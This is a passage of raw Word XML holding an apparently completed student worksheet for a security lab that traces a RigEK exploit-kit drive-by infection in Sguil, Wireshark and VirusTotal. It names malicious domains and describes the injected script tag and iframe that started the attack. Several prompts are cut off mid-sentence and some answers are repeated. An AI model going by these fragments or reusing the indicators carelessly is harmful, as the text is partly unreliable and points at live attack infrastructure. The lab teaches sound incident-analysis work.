        <w:t>. Compare the SHA1 hash value with the one from the previous step. The SHA1 hash values should be the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681148A">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>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9504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>276225</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>842010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5391150" cy="2546985"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="-76" y="-162"/>
                <wp:lineTo x="-76" y="21648"/>
                <wp:lineTo x="21600" y="21648"/>
                <wp:lineTo x="21600" y="-162"/>
                <wp:lineTo x="-76" y="-162"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13" name="Picture 13" descr="screenshot of virustotal.com with a file hash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of virustotal.com with a file hash enter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391150" cy="2546985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Open a web browser and go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>virustotal.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">. Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> tab and enter the hash value to search for a match in the database of known malware hashes. VirusTotal will return a list of the virus detection engines that have a rule that matches this hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FDE0F5">
      <w:pPr>
        <w:pStyle w:val="45"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257B59C4">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Investigate the Detection and Details tabs. Review the information that is provided on this hash value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D8009">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082F83BE">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The  Virus Total tell us about this file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDCF74">
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:spacing w:after="360"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Answers will vary, but from the response you can verify that the SWF is part of the RigEK exploit kit. 32 of 55 antivirus programs have rules that identify this hash as coming from a malware file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A785EF">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 xml:space="preserve">Close the browser and Wireshark. In Sguil, use alert ID 5.37 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS RIG EK Landing Sep 12 2016 T2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>) to pivot to Wireshark and examine the HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1AFEE">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CA057B">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>there any similarities to the earlier alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5141097D">
      <w:pPr>
        <w:pStyle w:val="43"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> the alerts show GET, POST and GET requests to tyu.benme,com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>pe your a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715D707">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> the files are differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE7007C">
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Yes. The two hashes match even though the filenames are different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B0622">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Create a SHA-1 hash of the SWF file as you did previously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DC9D22">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF71015">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>the same malware that was downloaded in the previous HTTP session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2730C548">
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Yes. The two hashes match even though the filenames are different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3172C8F7">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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In Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC39DB">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B946D5F">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>We seem to be post-infection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28348D7C">
      <w:pPr>
        <w:pStyle w:val="43"/>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T.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>All four alerts concern communication with the malware server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03249BD4">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The first alert in the last 4 alerts in the series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7AB5F6">
      <w:pPr>
        <w:pStyle w:val="43"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Sends a UDP code to a ransomware checkin server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A35CB6">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What type of communication is taking place in the second and third alerts in the series and what makes it suspicious?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A288163">
      <w:pPr>
        <w:pStyle w:val="43"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>They are DNS requests that are initiated from the local host; however, it is unlikely that they are the result of normal user activity. They must be sent by the malware file. The .top domain does not look like a valid domain name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8B9E8">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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Go to virustotal.com and do a URL search for the .top domain used in the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2700FEBB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3912BD">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490CF73">
      <w:pPr>
        <w:pStyle w:val="43"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>It is a malicious domain, that still triggers alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4814F7">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them to your home folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11591FA0">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the filenames :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231EF313">
      <w:pPr>
        <w:pStyle w:val="43"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>EE7EA-D39…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755FF159">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="660"/>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Examine Exploit Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBACE2D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>In this part, you will examine some of the documents that your exported from Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66356A">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">In Security Onion, open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the remodeling-your-kitchen-cabinets.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> file using your choice of text editor. This webpage initiated the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16B9DC">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1C1F23">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Can you find the two places in the webpage that are part of the drive-by attack that started the exploit? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: the first is in the &lt;head&gt; area and the second is in the &lt;body&gt; area of the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E376AE">
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:spacing w:after="240"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="lightGray"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">The script tag in the header loads the JavaScript file dle_js.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="magenta"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>from retrotip.visionurbana.com.ve. The iframe that load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>s content from tyu.benme.com is defined in the HTML body.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4CB983">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&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"&gt;</w:t>
      </w:r>
    </w:p>
